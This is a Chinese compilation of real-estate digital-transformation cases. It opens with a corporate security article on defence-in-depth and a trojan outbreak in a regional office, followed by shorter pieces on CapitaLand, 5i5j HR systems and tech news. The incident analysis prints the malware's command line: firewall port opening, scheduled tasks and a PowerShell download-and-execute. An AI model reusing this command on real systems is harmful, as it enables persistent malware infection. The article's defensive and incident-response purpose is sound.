6.房地產(chǎn)行業(yè)數(shù)字化轉(zhuǎn)型案例

目錄1、百家｜某地產(chǎn)集團企業(yè)數(shù)字化轉(zhuǎn)型期信息安全建設之路 12、【案例研究】凱德數(shù)字化轉(zhuǎn)型與創(chuàng)新 253、我愛我家數(shù)字化轉(zhuǎn)型推進人力資源管理升級 304、【數(shù)字化轉(zhuǎn)型實踐】中青建安集團實現(xiàn)“信息共享，智慧協(xié)同” 331、百家｜某地產(chǎn)集團企業(yè)數(shù)字化轉(zhuǎn)型期信息安全建設之路原創(chuàng)熊暾安在“百家”，既是“諸子百家”，亦為“百花齊放”。他們是各行各業(yè)網(wǎng)絡安全專家：有CSO、業(yè)界大咖、權威代表，更有奮戰(zhàn)在網(wǎng)安一線的實踐者、思想者和分享者。安在“百家”，最佳實踐，真知灼見，思想火花，期待有你！熊暾某地產(chǎn)公司信息安全主任資深安全專家第一部分、概述▲▲▲某大型房產(chǎn)公司，業(yè)務遍布港澳及內(nèi)地70余個城市及海外多個國家和地區(qū)。該企業(yè)自2017年以來，將加快信息化建設步伐進行數(shù)字化轉(zhuǎn)型當作重要戰(zhàn)略舉措，逐步加大信息化預算，實現(xiàn)數(shù)據(jù)智聯(lián)、創(chuàng)新賦能，支撐管理變革、引領業(yè)務創(chuàng)新。

信息安全是企業(yè)數(shù)字化轉(zhuǎn)型過程中不可避免或忽視的問題,決定企業(yè)數(shù)字化成敗的關鍵。在這個過程中，數(shù)據(jù)成為企業(yè)非常重要的資產(chǎn)，信息安全對于企業(yè)發(fā)展有不可估量的影響，企業(yè)的安全體系的構建是一個動態(tài)、長期的過程，難以一蹴而就。如何從戰(zhàn)略層面、治理層面、執(zhí)行層面上，全面、積極、有效地應對安全風險的同時，將風險轉(zhuǎn)化為機遇，推進數(shù)字化轉(zhuǎn)型的持續(xù)性發(fā)展，可謂任重而道遠。為了達到目的，該公司快速組建了信息安全團隊，在數(shù)字化轉(zhuǎn)型的過程中，不遺余力地推進了信息安全的建設。經(jīng)過近三年的建設，該企業(yè)已經(jīng)找到了適合自己的信息安全建設之路，以《網(wǎng)絡安全法》的實施為契機，順應等級保護標準要求，加強全方位主動防御、整體防控，實現(xiàn)對等保護對象的安全全覆蓋，從事后補救到安全前置，從局部分割到全面防護，從被動安全到主動安全的轉(zhuǎn)變，構筑主動、全面的安全防護體系，為數(shù)字化轉(zhuǎn)型保駕護航，這就是某大型房產(chǎn)公司數(shù)字化轉(zhuǎn)型之后交出的信息安全答卷。在具體建設步驟方面,從聚焦核心數(shù)據(jù)保護訴求出發(fā)，在信息化戰(zhàn)略規(guī)劃層面將信息安全建設分為筑圍墻、堅堡壘、精管控三個階段逐步推進，首先按照等級保護要求，進行了核心系統(tǒng)的等級保護測評工作，2018年順利完成測評整改，取得了測評證書，2019年更是啟動了云平臺的三級等保測評工作；在基礎架構安全建設方面，上線網(wǎng)絡流量回溯分析系統(tǒng)、WEB應用防火墻、運維審計堡壘機等，迅速在總部形成了護城河，公司整體的安全防御能力得到大大提升。針對員工信息安全意識薄弱問題，開展了長期的信息安全宣貫，通過OA內(nèi)網(wǎng)、移動門戶APP等多種方式推送安全小知識以及公司安全制度等，連續(xù)三年開展了“網(wǎng)絡安全周”宣傳活動，通過線上、線下跨平臺、全方位的宣傳，使得信息安全理念深入人心，在公司上下初步形成了“信息安全、人人有責”的文化氛圍，全面提升了員工的信息安全意識。在信息化高速發(fā)展的同時，黑產(chǎn)也在不斷進化，高級惡意代碼以快速變種、多樣化和動態(tài)交互的形式不斷演化，雖然該企業(yè)已經(jīng)建設了較為完善的縱深防御體系，但是面臨的風險和威脅依然眾多，包括如下：1、安全攻防能力極度不對等，如惡意代碼，和傳統(tǒng)病毒相比，變種更多、更新更快，傳統(tǒng)檢測方式更難發(fā)現(xiàn)；同時黑客攻擊更多的具備“海陸空”（不同攻擊載荷、攻擊方式、攻擊維度）、全天候、全方位打擊的特點，依靠單一的安全產(chǎn)品品或邊界防護往往無法滿足企業(yè)安全需求；2、地區(qū)公司防護薄弱，地區(qū)公司通過MPLS-VPN專線與總部進行互聯(lián)，同時各地區(qū)公司也有自己的互聯(lián)網(wǎng)出口進行上網(wǎng)，這樣帶來了諸多的風險；由于安全預算、人力的限制，地區(qū)公司沒有專職的安全團隊，往往很難進行高效的風險防范；3、內(nèi)網(wǎng)平坦化問題：目前該企業(yè)內(nèi)網(wǎng)連接著60多家地區(qū)公司，同時還與集團公司內(nèi)部兄弟公司等通過MPLSVPN進行連接，各公司安全建設水平參差不齊，更多的是注重網(wǎng)絡側(cè)的邊界防御，而內(nèi)部跨區(qū)防護，往往被選擇性忽視。在實際攻防場景中，再“高”再“厚”的墻也終將被繞過。一旦攻擊者突破某個地區(qū)公司邊界取得初步權限，內(nèi)部安全能力的真空很容易導致集體淪陷，攻擊者進入內(nèi)網(wǎng)之后橫向滲透，往往一馬平川，無往不利；4、單點安全能力永遠存在漏報和誤報的問題。即使當前攻擊被阻斷，道高一尺魔高一丈，攻擊者經(jīng)過一段時間的研究，也有可能繞過防護。而安全設備和業(yè)務系統(tǒng)兼容是一個長期的磨合過程，必然會導致出現(xiàn)無效告警，而真正有效的告警，往往被淹沒其中。第二部分、該企業(yè)信息安全建設思路▲▲▲為有效應對目前面臨的問題和滿足安全迫切需求，我們需要利用基于大數(shù)據(jù)機器學習技術對已知威脅進行模式挖掘，然后通過專家分析，提取惡意行為并輸出安全能力，具備威脅情報檢測、網(wǎng)絡異常檢測、入侵檢測、主機行為檢測等多種安全能力，從“端、邊界、云”的空間維度上以及“預警、監(jiān)測、分析、清除”的時間維度上實現(xiàn)安全防護的閉環(huán)管理，真正做到“全面防御、主動預警、安全運營，全天候、全方位感知網(wǎng)絡安全態(tài)勢”。為了達到這個目標，我們制訂了企業(yè)信息安全宙斯盾計劃，從如下幾個方面進行了安全建設，包括：攻防側(cè)：收斂攻擊面，具備有效防護各類已知攻擊的能力；網(wǎng)絡側(cè)：具備覆蓋全部網(wǎng)絡協(xié)議棧的分析、檢測和分析回溯能力，能夠覆蓋全部邊界和MPLSVPN互聯(lián)的鏈路；主機側(cè)：以業(yè)務主機（服務器）為安全防御重點，構建最后一公里防線，快速搭建自適應防御體系；終端側(cè)：建立終端安全防御體系，同時通過檢測網(wǎng)絡流量中的DGA域名，定位網(wǎng)絡內(nèi)部已經(jīng)被控的主機。安全域劃分：基于零信任網(wǎng)絡原則，進行層次化劃分，尤其是對內(nèi)網(wǎng)互聯(lián)的網(wǎng)絡進行有效隔離，防止堡壘從內(nèi)部被突破，打造不被繞過的馬奇諾防線。第三部分、該企業(yè)信息安全建設具體成果▲▲▲在我們近三年的安全建設成果來說，基本行動計劃包括如下：（1）堅壁清野步步為營面對上面所面臨的風險，在總部數(shù)據(jù)中心層面，通過開展敏感信息清理、網(wǎng)絡資產(chǎn)摸底清理、收斂網(wǎng)絡攻擊暴露面、安全風險排查整改、重點目標防御等專項工作，同時配合常態(tài)化的漏洞掃描工作，逐步整改安全漏洞，淘汰下線不安全業(yè)務系統(tǒng)；對安全設備策略進行有效收緊，形成了漏洞收斂、防護有效、保障有力的安全局面。目前公司總部對外互聯(lián)網(wǎng)IP150+個，互聯(lián)網(wǎng)帶寬150Mbps，業(yè)務系統(tǒng)60+個，累計一年防御DDOS攻擊252萬余次，攔截網(wǎng)絡層攻擊2160萬次，攔截應用層攻擊72萬余次；（2）誘敵深入層層設防為了解決內(nèi)網(wǎng)攻擊以及未知威脅問題，公司總部上線了開源的蜜罐系統(tǒng)T-Pot,惡意代碼和行為檢測作為抵御黑客和網(wǎng)絡犯罪分子防御的第一道防線。它主要應用特征庫和行為的辨別技術，不可避免的帶來誤報和漏報的問題。蜜罐系統(tǒng)則有效的避免了這個問題，通過構建偽裝的業(yè)務主動引誘攻擊者，在預設的環(huán)境中對入侵行為進行檢測、分析，還原攻擊者的攻擊途徑、方法、過程等，并將獲取的信息用于保護真實的系統(tǒng)；通過蜜罐系統(tǒng)，利用欺騙防御技術，經(jīng)過精密設計，在惡意黑客必經(jīng)之路上布置誘餌節(jié)點，混淆其攻擊目標，從而隔離并保護企業(yè)真實資產(chǎn)，拖延黑客攻擊時間。蜜罐系統(tǒng)能夠高精度、準確無誤地發(fā)現(xiàn)潛在威脅，捕獲威脅后將在第一時間報警，速度優(yōu)于傳統(tǒng)安全防護手段，用蜜罐獲取到攻擊者信息，比如攻擊者的IP，就可以通過防火墻及WAF設備對攻擊來源進行封堵。該企業(yè)部署蜜罐系統(tǒng)以來，全年捕獲各種攻擊40萬+次，攻擊IP2800+個，與防火墻、WAF等形成良好互補。圖：蜜罐捕獲到的暴力破解用戶名和密碼（3）內(nèi)網(wǎng)隔離縱深防御針對內(nèi)網(wǎng)平坦化問題，我們通過進行安全域劃分方式，對內(nèi)網(wǎng)進行了初步隔離，對來自地區(qū)公司和兄弟公司的互聯(lián)請求不再采取默認放行規(guī)則，而是基于零信任網(wǎng)絡原則，進行層次化劃分，防止病毒木馬縱向感染橫向傳播。通過子公司網(wǎng)絡規(guī)范,落實子公司邊界安全防護體系，各地區(qū)分公司互聯(lián)網(wǎng)出口處部署了防火墻，終端層面部署了防病毒軟件，完成全公司4000+終端防病毒軟件部署；同時定期推進專項巡檢工作，對地區(qū)公司進行終端安全掃描，對發(fā)現(xiàn)的存在高危漏洞的終端進行督促整改；日常工作中，對地區(qū)公司發(fā)現(xiàn)感染僵尸、木馬、蠕蟲的終端進行及時通報整改。根據(jù)部署在邊界、終端、云網(wǎng)絡、專線網(wǎng)絡的各種安全設備的特點，有的放矢設計對應的檢測手段，揚長補短，充分發(fā)揮數(shù)據(jù)聯(lián)動分析的作用，建立了較為完善的縱深防御體系，形成了橫向到邊、縱向到底的立體防御框架并切實落地，達到較好效果。（4）萬物皆明精確感知再高級的攻擊，都會留下網(wǎng)絡痕跡，因此，進行網(wǎng)絡全流量分析是精確感知安全的一個非常好用的手段，全流量威脅分析回溯系統(tǒng)能夠快速檢測各類重點事件，如APT攻擊事件、Botnet事件、惡意樣本傳播、WebShell、隱蔽隧道等高危安全事件。以流量行為為例，正常網(wǎng)絡層的連接行為是松散的、隨機分布的，如下圖：而異常連接的情況下，比如終端感染木馬并成為僵尸主機之后將對同網(wǎng)段和外網(wǎng)進行掃描攻擊，其連接行為將會如下：通過如上規(guī)則，在流量分析回溯系統(tǒng)上可以很好的進行預警，及時定位網(wǎng)絡內(nèi)部已經(jīng)被控的主機。同時，流量分析回溯系統(tǒng)可以很好的進行C&C服務器訪問監(jiān)控（Command&ControlServer，是指揮控制僵尸網(wǎng)絡的主控服務器）。每個木馬實例通過和它的C&C服務器通訊獲得指令進行攻擊活動，包括獲取攻擊開始的時間和目標，上傳從宿主機偷竊的到的信息，定時給感染機文件加密勒索等。通過引入外部威脅情報，與自身流量分析回溯系統(tǒng)有機結(jié)合，很好的解決了分支機構的僵尸網(wǎng)絡問題。目前，我們已經(jīng)成熟應用基于域名、IP地址、樣本特征等進行失陷檢測，將遠控或者惡意下載的各類IP、域名和URL進行一鍵攔截和預警，同時可將失陷主機與外網(wǎng)通信、在內(nèi)網(wǎng)進行傳播擴散與滲透、最終達成攻擊目標的全過程完整繪制出來。（5）情報驅(qū)動安全聯(lián)動在網(wǎng)絡安全體系的建設過程中，是一個由點到面的過程，上線過程中不同廠家不同品牌的安全設備會不可避免的處于分散狀態(tài)，而不是天然的具備聯(lián)動機制；而單點安全能力永遠存在漏報和誤報的問題；我們在三年的安全建設和安全運營過程中，也發(fā)現(xiàn)了這個問題，往往需要投入大量人力進行各種設備的策略調(diào)優(yōu)，如攻擊者突破了防火墻和WAF設備的第一道防線后，雖然被流量分析系統(tǒng)和蜜罐發(fā)現(xiàn)，但是往往需要安全管理員手工處理告警，來進行IP攔截，時效性無法得到保證，安全源于聯(lián)動，各自為營．怎能協(xié)同工作?為了解決這個問題，我們宙斯盾計劃的核心就是通過威脅情報建立各安全設備的聯(lián)動機制，實現(xiàn)安全協(xié)同、全網(wǎng)聯(lián)動。在這個建設過程中，我們引入互聯(lián)網(wǎng)大情報體系，對情報信息進行強度整合、高度共享、深度運用；同時結(jié)合防火墻、WAF、流量分析系統(tǒng)、態(tài)勢感知、蜜罐等集中告警日志處理，借助技術中臺，建立小情報體系（私有云），這個私有情報系統(tǒng)，我們也稱之為安全中臺雛形，既能夠?qū)崟r調(diào)用防火墻、WAF接口進行聯(lián)動處理，也能夠?qū)ν馓峁┙o集團各兄弟公司使用，極大程度上縮減了安全事件的處理時間，能夠以最高效的方式解決安全問題。通過這樣的安全設備聯(lián)動管理，能夠保證系統(tǒng)內(nèi)的安全設備協(xié)同工作,提高安全事件的檢測精度和處理效率,從而應對日趨復雜多變的網(wǎng)絡安全威脅。（6）應急響應全網(wǎng)協(xié)防我們進一步健全完善了網(wǎng)絡安全事件監(jiān)測發(fā)現(xiàn)、通報預警、應急處置一體化機制；在安全運營過程中，監(jiān)測只是第一步，后續(xù)還有處置、溯源、修復、優(yōu)化等一系列過程，對需要對待處理事件區(qū)分優(yōu)先級，形成小時級、日級、周級、月級處理機制，讓重要事件得到及時解決。對于實時發(fā)生的失陷事件，不斷惡化的安全事件，我們將全網(wǎng)預警，提高應急響應級別，及時將信息安全事件扼殺在萌芽狀態(tài)。對于漏洞掃描、基線核查、安全更新等工作，我們已經(jīng)形成周期性任務執(zhí)行，按季度進行常規(guī)化跟蹤、處理。同時我們推行各種專項行動，如密碼安全專項檢視計劃、全網(wǎng)終端安全掃描行動、滲透測試、安全演練等，及時掌握和解決影響網(wǎng)絡安全運行方面出現(xiàn)或存在的有關問題，提升安全防護水平。下面，通過一個典型的信息安全案例，來介紹該企業(yè)信息安全建設成果及相關經(jīng)驗總結(jié)，這個實戰(zhàn)案例，既是對過往安全建設的成果檢驗，也為后續(xù)的安全體系建設提供了寶貴的經(jīng)驗。第四部分、真實信息安全應急事件案例分享▲▲▲12月2號凌晨，分支機構上海公司將一臺文件共享服務器的遠程桌面端口違規(guī)暴露在公網(wǎng)，被攻破之后導致當?shù)卮罅拷K端感染變種木馬，并在網(wǎng)絡內(nèi)部大量擴散攻擊行為（累計感染50多臺，占比近50%），總部通過流量分析系統(tǒng)及威脅情報服務、蜜罐服務進行了第一時間預警，在防火墻和防病毒軟件未能夠徹底防御此變種木馬的情況下，經(jīng)過2天的應急響應，已基本完成終端的查殺和加固，未對集團內(nèi)網(wǎng)造成較大影響。本次案例中，總部通過流量分析系統(tǒng)及威脅情報服務，第一時間發(fā)現(xiàn)了上海公司終端的DNS域名異常訪問行為并預警（木馬通過C&C服務器地址通訊獲取遠程控制命令），部署的蜜罐服務發(fā)現(xiàn)了上海公司中毒終端對總部數(shù)據(jù)中心的橫向滲透攻擊，并捕獲了其攻擊手法（木馬綜合利用MS17-010永恒之藍漏洞攻擊、SMB爆破攻擊、sql爆破攻擊等功能,并在攻擊成功的目標機器上安裝計劃任務執(zhí)行多個Powershell后門,下載執(zhí)行新的攻擊模塊）；由于總部防火墻的安全域劃分有效，策略有效收緊，內(nèi)網(wǎng)未出現(xiàn)部分終端中毒后一馬平川的攻擊局面，其余地區(qū)公司大部分也在前期的專項行動中進行了加固，未造成大規(guī)模橫向滲透。經(jīng)過本次實戰(zhàn)檢驗，驗證了該企業(yè)縱深防御體系和監(jiān)控應急預警體系的有效性。通過對該事件的總結(jié)和反思，形成信息安全可借鑒的經(jīng)驗和教訓，有利于大家共同提升安全水平。?病毒名：驅(qū)動人生新變種?感染方式：該病毒通過“永恒之藍”漏洞掃描445端口傳播，通過暴力破解傳播密碼方式傳播，通過RDP遠程桌面3389端口漏洞傳播，通過掃描SqlServer數(shù)據(jù)庫方式傳播；?后果影響：感染內(nèi)網(wǎng)之后，將進行橫向滲透掃描，并在每個感染終端上增加計劃任務，每個小時從后臺接受指令，下載攻擊木馬，同時進行挖礦行為，不排除進行文件勒索比特幣等行為；?處置：總部監(jiān)控發(fā)現(xiàn)之后提升預警級別，并要求上海公司斷網(wǎng)，升級殺毒軟件版本，地毯式對終端進行查殺，3號晚上完成網(wǎng)內(nèi)病毒傳播抑制。?后續(xù)總結(jié)：上海公司防火墻維護不及時，策略未收緊，且將重要的文件共享服務器（）的遠程桌面端口暴露在公網(wǎng)；內(nèi)網(wǎng)終端補丁更新不及時，未按照總部要求進行MS17-010漏洞及MS19-0708漏洞的徹底整改；PC存在弱口令，員工安全意識不高，均給病毒橫向滲透造成較大便利。第五部分、安全事件處置及朔源過程▲▲▲

1.

事件時間軸本次總部通過威脅情報、蜜罐及流量分析系統(tǒng)，較好的進行了本次監(jiān)控應急預警，也對后續(xù)的安全體系建設提供了寶貴的經(jīng)驗。2.

相關處置過程截圖經(jīng)文件服務器日志分析，發(fā)現(xiàn)12月2日4點46分木馬服務被安裝2019-12-024:57總部威脅情報系統(tǒng)收到第一個DNS告警：嘗試訪問驅(qū)動人生域名：與上一條日志吻合和匹配2019-12-026:48總部蜜罐系統(tǒng)收到來自5的利用永恒之藍445端口的漏洞攻擊，說明木馬已經(jīng)開始全網(wǎng)掃描，并開始嘗試攻擊總部數(shù)據(jù)中心的服務器及數(shù)據(jù)庫。木馬服務示例:BCQWCTRQORNYUISBFDKU（名稱會隨機生成）服務文件名:%COMSPEC%/C"netsh.exefirewalladdportopeningtcp65529SDNS&netshinterfaceportproxyaddv4tov4listenport=65529connectaddress=connectport=53&schtasks/create/rusystem/scMINUTE/mo10/tnRtsa/tr"powershell-nop-epbypass-c'IEX(New-ObjectSystem.Net.WebClient).DownloadString(\\\"/ipc.jsp?h\\\")'"/F&echo%%path%%|findstr/ipowershell>nul||(setxpath"%path%;c:\windows\system32\WindowsPowershell\v1.0"/m)&schtasks/run/tnRtsa&ver|findstr"5\.[0-9]\.[0-9][0-9]*"&&(schtasks/create/rusystem/scMINUTE/mo60/tnRtas/tr"mshta/p.html?_%%COMPUTERNAME%%")"木馬服務為防止被刪掉，每個小時重復執(zhí)行下載指令

在總部防火墻上看到的感染終端對總部的3389端口掃描第六部分、經(jīng)驗教訓總結(jié)▲▲▲由于終端的安全極大的影響了整個數(shù)據(jù)中心安全，多個網(wǎng)絡安全事件及蠕蟲均由終端感染導致，同時IOT設備的蠕蟲也逐漸增多，需要加大安全整改力度，確保終端安全。在此次事件中，我們進行了經(jīng)驗總結(jié)如下：1、好的實踐經(jīng)驗已經(jīng)初步構建網(wǎng)絡安全縱深防御體系,形成橫向到邊、縱向到底的立體防御框架。?在總部，已經(jīng)上線了防火墻、DDOS防護設備、WAF等防護設備，同時也上線了流量分析回溯系統(tǒng)，并對接了威脅情報服務；為了有效監(jiān)控惡意行為及未知的攻擊，上線了蜜罐系統(tǒng)，與防火墻和WAF形成良好互補；?通過子公司網(wǎng)絡規(guī)范,落實子公司邊界安全防護體系，建成終端安全防御體系，完成全公司4000+終端防病毒軟件部署；?對集團內(nèi)網(wǎng)網(wǎng)絡進行有效隔離，杜絕內(nèi)網(wǎng)平坦化，禁止了高危端口445、1433、3389等訪問；?專項行動:對地區(qū)公司進行終端安全掃描及加固；?日常監(jiān)控和督辦，在日常工作中，對地區(qū)公司感染僵尸、木馬、蠕蟲的終端進行通報并整改；2、

存在的不足本次也反映出，安全形勢較為嚴峻，后續(xù)需要采取回頭看的方式，常態(tài)化的檢查終端安全狀況，包括如下：?地區(qū)公司的信息安全防御體系還屬于薄弱環(huán)節(jié)，僅僅依靠防火墻、防病毒的單一防護手段依然不夠，還需要建立監(jiān)控、預警和響應體系；?員工的信息安全意識還需要進一步加強，應結(jié)合網(wǎng)絡安全形勢與地區(qū)公司實際進行有針對性的信息安全培訓，切實提高員工安全意識，保密密碼安全、上網(wǎng)安全、郵件安全等知識普及；?地區(qū)公司的安全專項行動依然不夠，需要進行常態(tài)化的安全掃描、安全加固工作；?監(jiān)控和應急響應是安全必不可缺的一環(huán)，需要加強人員、資產(chǎn)投入，同時進行定期演練。網(wǎng)絡攻防、事件處置等是安全工作的一個基礎安全工作，但是同時也是較大壓力的一環(huán)，一旦安全風險無法控制，可能導致“滿盤皆輸”。安全運營建設既離不開人、財、物的投入和機制建設，更需要安全運營團隊技術能力的提升。謹以此案例提供借鑒，以便有助于實現(xiàn)企業(yè)安全戰(zhàn)略，更好地保障企業(yè)業(yè)務安全穩(wěn)定運行。2、【案例研究】凱德數(shù)字化轉(zhuǎn)型與創(chuàng)新Gartner公司凱德是亞洲最大的房地產(chǎn)公司之一，總部設在新加坡，自1994年進入中國以來，凱德已在中國42座城市擁有/管理200多個項目，憑借集團橫跨購物中心、辦公樓、住宅、服務式公寓、房地產(chǎn)投資信托和基金等多元化的全產(chǎn)業(yè)鏈優(yōu)勢，以及豐富的綜合開發(fā)及運營經(jīng)驗，經(jīng)過多年的發(fā)展，凱德致力于創(chuàng)新性地構建和實踐綜合體戰(zhàn)略，以契合新型城鎮(zhèn)化的趨勢，實現(xiàn)社會、企業(yè)、個人的可持續(xù)發(fā)展，與中國共成長。簡介挑戰(zhàn)統(tǒng)一數(shù)字化轉(zhuǎn)型愿景統(tǒng)一“數(shù)字化是一切的中心”的目標明確執(zhí)行層面的業(yè)務重點解決方法與高管合伙人定期召開審議會議分析師提供深度解讀與洞察同行交流與分享GartnerIT博覽會提供全面技術發(fā)展趨勢影響驗證商業(yè)模式提高內(nèi)部滿意度與積極性有效傳承行業(yè)趨勢研究與知識如何實現(xiàn)價值Gartner研究與工具專家主題研討會高管合伙人定期會議幫助戰(zhàn)略制定 業(yè)務挑戰(zhàn) 作為中國十大房地產(chǎn)企業(yè)之一，在中國數(shù)字化快速發(fā)展的大環(huán)境下，凱德要將數(shù)字化能力作為未來企業(yè)發(fā)展的核心競爭力，并將以數(shù)字化創(chuàng)新作為所有業(yè)務的核心驅(qū)動力，實現(xiàn)“數(shù)字化是一切的中心“。然而數(shù)字化轉(zhuǎn)型面臨三方面的挑戰(zhàn)：首先，房地產(chǎn)并不是數(shù)字化程度領先的行業(yè)，所以在數(shù)字化轉(zhuǎn)型帶來的能量并不清晰的前提下，企業(yè)需要有統(tǒng)一愿景，自上而下對實現(xiàn)的目標有高度共識。其次，要有統(tǒng)一的業(yè)務發(fā)展目標，把數(shù)字化作為一切發(fā)展的中心，層層推進。再次，在執(zhí)行層面，有三方面的業(yè)務重點工作需要解決：傳統(tǒng)IT重組，從總部垂直管理到目前以國家為單位的管理，深化本土化，同時平衡和總部的關系，驅(qū)動所有賽道的改革。

實現(xiàn)數(shù)字化運作，一方面完成從信息化向數(shù)字化轉(zhuǎn)型的技術層面驅(qū)動和業(yè)務流程再造；另一方面要產(chǎn)生新的數(shù)字化營收去驅(qū)動新的業(yè)務模式的改革。

自上而下地營造數(shù)字化轉(zhuǎn)型的企業(yè)文化。 Gartner的服務方式 Gartner的高管合伙人與凱德領導層定期舉行階段性會議，審議戰(zhàn)略，發(fā)現(xiàn)策略演進中需要的額外的知識和信息并從Gartner的研究報告中提取吸收這些信息。在需要深入了解探討的議題上，Gartner的分析師會提供分析與洞察。另外，Gartner定期舉辦分析師主題分享，在與同行的共同參與中，對一些針對性的報告有了深度的理解與交流。Gartner的全球IT盛會，也幫助凱德對前沿技術發(fā)展趨勢有了更加全面的了解與把握。 Gartner給客戶帶來的價值 在戰(zhàn)略層面上，Gartner的服務給凱德提供了一個宏觀的視角，驗證數(shù)字化轉(zhuǎn)型的商業(yè)模式。另一方面，對于CIO而言，整體預算方面的趨勢的了解，以及行業(yè)變革和IT領域創(chuàng)新的研究的背書，提高了內(nèi)部對數(shù)字化轉(zhuǎn)型的積極性與滿意度，對戰(zhàn)略推進很有幫助。Gartner對行業(yè)趨勢的研究與把握對凱德來講是很好的沉淀與總結(jié)，可以有效的傳承下來，有利于能力提升并直接節(jié)省培訓成本。凱德期待在和Gartner合作的過程中能進一步驗證數(shù)字化營收，并在具體實施過程中，運用Gartner提供的工具和方法論將一些技術做項目化拆解運作，實現(xiàn)業(yè)務目標?！獎P德中國董事李琤潔 3、我愛我家數(shù)字化轉(zhuǎn)型推進人力資源管理升級

原創(chuàng)小錦首席數(shù)字官1數(shù)字化轉(zhuǎn)型案例1我愛我家推進人力資源管理升級進行數(shù)字化轉(zhuǎn)型近日，我愛我家的人力資源管理也在迅速完成“數(shù)字化”。今年7—8月先后上線電子簽章平臺和招聘管理平臺。電子簽章平臺有效解決了日常工作中紙質(zhì)合同占用存儲空間大、管理成本高、易丟失等弊端;招聘管理平臺則通過完整的招聘痕跡,幫助HR找到更多的優(yōu)秀候選人,大大提升了招聘效率。未來,我愛我家將繼續(xù)推進數(shù)字化戰(zhàn)略,以數(shù)據(jù)為基礎,進行深度人才管理洞察,給出更前瞻的人才管理建議、更智能的人才管理決策,制定更前瞻的人才管理規(guī)劃。2天貓、菜鳥聯(lián)合發(fā)布家電供應鏈數(shù)字化再升級戰(zhàn)略近日，天貓、菜鳥聯(lián)手家電品牌建立了業(yè)內(nèi)銷售預測和先進協(xié)同體系，還與海爾、美的、九陽、西門子、奧克斯等深度對接，實現(xiàn)全鏈路可視可控可售，產(chǎn)生庫存周轉(zhuǎn)加速、物流成本下降、消費者好評提升等一系列成效。此次供應鏈再升級的一大亮點是本地化流量分發(fā)，通過大數(shù)據(jù)和算法的精準匹配、貨品的區(qū)域化布局，向消費者優(yōu)先推薦距離最近的商品，從而有效提高效率和降低倉儲物流成本。2數(shù)字化技術應用1華為發(fā)布鴻蒙系統(tǒng)探索5G物聯(lián)網(wǎng)時代近日，華為在2019年華為全球開發(fā)者大會上正式發(fā)布了“鴻蒙”操作系統(tǒng)，該系統(tǒng)旨在滿足全場景智慧體驗的高標準的連接要求，將廣泛應用于手機、車載設備、智能手表、智能家居等只能終端。根據(jù)華為的介紹，鴻蒙OS的“分布式OS架構”和“分布式軟總線技術”通過公共通信平臺，分布式數(shù)據(jù)管理，分布式能力調(diào)度和虛擬外設四大能力，將相應分布式應用的底層技術實現(xiàn)難度對應用開發(fā)者屏蔽。2英國將建國家實驗室推動人工智能輔助醫(yī)療近日，英國政府將投入2.5億英鎊（約合21.36億元）以推動人工智能技術在醫(yī)療領域內(nèi)的應用，其中包括設立一個國家人工智能實驗室。據(jù)悉，英國部分醫(yī)院已經(jīng)與一些科技公司開展合作探討人工智能在醫(yī)療體系中的應用。新的國家實驗室將集中開展相關研發(fā)工作，包括提升癌癥篩查效率、構建計算模型以預測醫(yī)院需求、識別疾病、推進醫(yī)院工作流程自動化、減輕醫(yī)護人員工作負擔等。3小桔車服與平安戰(zhàn)略合作，涉租車、養(yǎng)車、能源等領域近日，滴滴旗下小桔車服與平安集團旗下平安銀行股份有限公司、平安國際融資租賃有限公司、平安財產(chǎn)保險公司、平安基礎產(chǎn)業(yè)投資基金管理有限公司簽署戰(zhàn)略合作協(xié)議。未來，平安與小桔車服將圍繞“汽車生命周期”在租車、保險、維保、充電等領域展開合作，共同為用戶提供一站式汽車服務。4華為在渝云計算